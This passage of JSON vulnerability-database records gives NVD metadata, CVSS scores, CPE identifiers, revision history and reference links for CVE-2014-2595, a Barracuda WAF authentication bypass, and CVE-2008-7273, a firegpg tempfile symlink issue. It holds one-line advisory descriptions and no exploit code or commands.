"6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-12T14:27:29", "modified": "2020-02-12T01:15:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["modified"], "edition": 2, "lastseen": "2020-02-12T14:27:29"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-10-03T12:01:15", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-10-03T12:01:15", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [], "hash": "65fabd8c3b92ccbba797b3dfba517234b9e0e8bc2464531f2cd64047dd457870", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-10-03T12:01:15", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 56}, "differentElements": ["extraReferences"], "edition": 6, "lastseen": "2020-10-03T12:01:15"}, {"bulletin": {"affectedSoftware": [{"name": "barracuda web_application_firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-02-21T13:06:26", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-02-21T13:06:26", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "4423bdd8d6936961112ee89e752cf7c866f443470052f4a4ac3529b4be6ae18f", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}, {"hash": "ee2d931efb4c4fa7a1a321df76c0b838", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-21T13:06:26", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 47}, "differentElements": ["cvss3", "affectedSoftware"], "edition": 4, "lastseen": "2020-02-21T13:06:26"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T06:14:28", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2021-02-02T06:14:28", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "hash": "d6e72c33ebf3accfe25046812d0b1e7698f2d37c9159defa7c7bda26e2ab359b", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "073d5951cb97bd54baf9ef00e5950ef4", "key": "extraReferences"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "immutableFields": [], "lastseen": "2021-02-02T06:14:28", "modified": "2020-02-20T15:55:00", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 60}, "different_elements": ["cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T06:14:28"}], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13887", "SECURITYVULNS:DOC:31004"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127740"]}, {"type": "exploitdb", "idList": ["EDB-ID:39278"]}], "modified": "2021-04-22T23:44:08", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-04-22T23:44:08", "rev": 2}}, "type": "cve", "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a97b191a26cb922c0b82d26c5f04f4db"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "832b9c21b4589969549f63eb0724398c"}, {"key": "cpe23", "hash": "405ecfc0fb244283a2773863614145bf"}, {"key": "cpeConfiguration", "hash": "238f536d7ccbcb60d24ab76ed2548b8b"}, {"key": "cvelist", "hash": "afd8c4a8002c25596504fc1efc107886"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "cwe", "hash": "86870277fcb3e3e121fe9e4f1f7c2b51"}, {"key": "description", "hash": "584cd9e6927eaaa814c6545414f09911"}, {"key": "extraReferences", "hash": "073d5951cb97bd54baf9ef00e5950ef4"}, {"key": "href", "hash": "756bd44ad36e62b951b7a08611cbd3f5"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "92ee34fefd5301ff6ccb77b813c8d4f8"}, {"key": "published", "hash": "6c607768196e3786ab17cb3a6e516cad"}, {"key": "references", "hash": "cf46dbeffc0c7dc51130bcd388b4459a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "bc7f8fc71017e1124d57947313af5643"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "scheme": null, "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cwe": ["CWE-613"], "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "immutableFields": []}, {"id": "CVE-2008-7273", "bulletinFamily": "NVD", "title": "CVE-2008-7273", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "published": "2019-11-18T22:15:00", "modified": "2019-11-20T15:56:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "cvelist": ["CVE-2008-7273"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedSoftware": [{"name": "getfiregpg iceweasel-firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:iceweasel-firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-12-18T13:57:06", "references": [], "rev": 2}, "score": {"modified": "2019-12-18T13:57:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "d61e8c253c1f5d35ed5977532afcfe58d323a03057be4323e8c19bd7bed39d26", "hashmap": [{"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "3e1e24cf5fed13b85f5534cb239a1044", "key": "cpe"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4464888dd8ea79b7344278e86594f061", "key": "affectedSoftware"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2019-12-18T13:57:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2019-12-18T13:57:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "557fd4cb813bf4897b5fdca93f953d2fe22dd9fed46f9a924ed2d03719983a4f", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-09-21T13:59:22", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": 